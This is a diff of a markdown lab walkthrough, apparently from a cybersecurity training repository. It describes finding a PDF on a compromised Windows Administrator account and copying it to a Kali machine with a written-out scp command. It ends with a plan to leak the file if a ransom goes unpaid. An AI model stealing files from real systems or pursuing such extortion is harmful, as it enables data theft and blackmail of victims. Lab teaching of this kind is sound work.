devansedmak/cybersecurity/home.md

 <div align="justify">

 Once we have a SSH session, where we impersonate an account with high privileges, we can again search for some interesting files.
 Use the command `cmd` and then move to the Desktop directory with `cd`.
 Let’s try to search for some PDF documents with the command `dir *.pdf`.
 We can see (_Fig.
-3_) that there is a file called _important.pdf_, that contains useful information for the Administrator.
-Let’s retrieve a copy of this document to the Kali machine.
+3_) that there is a file called _important.pdf_, that probably contains crucial information for the _Administrator_.
+Let’s retrieve a copy of this document from the target and send it to the Kali machine.
 To do this, we need to exit the SSH session (command `exit`) and then use the command `scp Administrator@10.0.2.4:C:/Users/Administrator/Desktop/important.pdf /home/kali/`.
-We insert again the obtained password and the file will now be copied to the Kali machine.
+We insert again the _Administrator_'s password and the file will now be copied to the Kali machine.
 We can then diffuse the content of this file if the ransom will not be paid by a reasonable deadline.

 </div>